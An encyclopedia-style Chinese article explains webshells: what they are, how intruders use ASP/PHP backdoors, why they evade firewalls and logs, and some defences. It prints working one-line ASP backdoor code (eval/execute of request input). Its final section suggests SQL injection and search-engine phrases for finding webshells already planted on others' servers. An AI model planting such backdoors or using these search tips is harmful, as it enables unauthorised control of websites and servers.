定義
顧名思義,"web 顯然需要服務器開放web服務,"shell" - 取得對服務器某種程度上操作權限。
作用
一方面,webshell被站長常常用于網站管理、服務器管理等等,根據FSO權限的不同,作用有在線編輯網頁腳本、上傳下載文件、查看數據庫、執行任意程序命令等。
另一方面,被入侵者利用,從而達到控制網站服務器的目的。這些網頁腳本常稱為WEB腳本木馬,目前比較流行的asp或php木馬,也有基于.NET的腳本木馬。
隐蔽性
有些惡意網頁腳本可以嵌套在正常網頁中運行,且不容易被查殺。
webshell可以穿越服務器防火牆,由于與被控制的服務器或遠程主機交換的數據都是通過80端口傳遞的,因此不會被防火牆攔截。并且使用webshell一般不會在系統日志中留下記錄,隻會在網站的web日志中留下一些數據提交記錄,沒有經驗的管理員是很難看出入侵痕迹的。
防範
從根本上解決動态網頁腳本的安全問題,要做到防注入、防暴庫、防COOKIES欺騙、防跨站攻擊等等,務必配置好服務器FSO權限。
常見webshell
“海陽頂端網asp後門”,還有“殺手十三”等功能豐富的後門
一句話後門 <%eval request("value")%> 或者 <%execute request("value")%> 或者 <%execute(request("value"))%> 或者他們的加密變形。
webshell還有jsp,php等多種腳本形式。
webshell概論
webshell是web入侵的腳本攻擊工具。簡單的說來,webshell就是一個asp或php木馬後門,黑客在入侵了一個網站後,常常在将這些asp或php木馬後門文件放置在網站服務器的web目錄中,與正常的網頁文件混在一起。然後黑客就可以用web的方式,通過asp或php木馬後門控制網站服務器,包括上傳下載文件、查看數據庫、執行任意程序命令等。
為了更好理解webshell我們學習兩個概念:
什麼是“木馬”?
“木馬”全稱是“特洛伊木馬(Trojan Horse)”,原指古希臘士兵藏在木馬内進入敵方城市從而占領敵方城市的故事。在Internet上,“特洛伊木馬”指一些程序設計人員在其可從網絡上下載(Download)的應用程序或遊戲中,包含了可以控制用戶的計算機系統的程序,可能造成用戶的系統被破壞甚至癱瘓。
什麼是後門?
一台計算機上有65535個端口,那麼如果把計算機看作是一間屋子,那麼這65535個端口就可以它看做是計算機為了與外界連接所開的65535扇門。每個門的背後都是一個服務。有的門是主人特地打開迎接客人的(提供服務),有的門是主人為了出去訪問客人而開設的(訪問遠程服務)——理論上,剩下的其他門都該是關閉着的,但偏偏由于各種原因,很多門都是開啟的。于是就有好事者進入,主人的隐私被刺探,生活被打擾,甚至屋裡的東西也被搞得一片狼迹。這扇悄然被開啟的門——就是“後門”。
webshell的優點:
webshell 最大的優點就是可以穿越防火牆,由于與被控制的服務器或遠程主機交換的數據都是通過80端口傳遞的,因此不會被防火牆攔截。并且使用webshell一般不會在系統日志中留下記錄,隻會在網站的web日志中留下一些數據提交記錄,沒有經驗的管理員是很難看出入侵痕迹的。
如何尋找webshel:
1,腳本攻擊SQL注入;
2,使用注入工具;
3,在浏覽器裡打開百度,輸入搜索關鍵詞"在本頁操作不需要FSO支持&"或者"一次隻能執行一個操作",然後點擊搜索,很快就可以看到檢索到了大量的查詢結果。
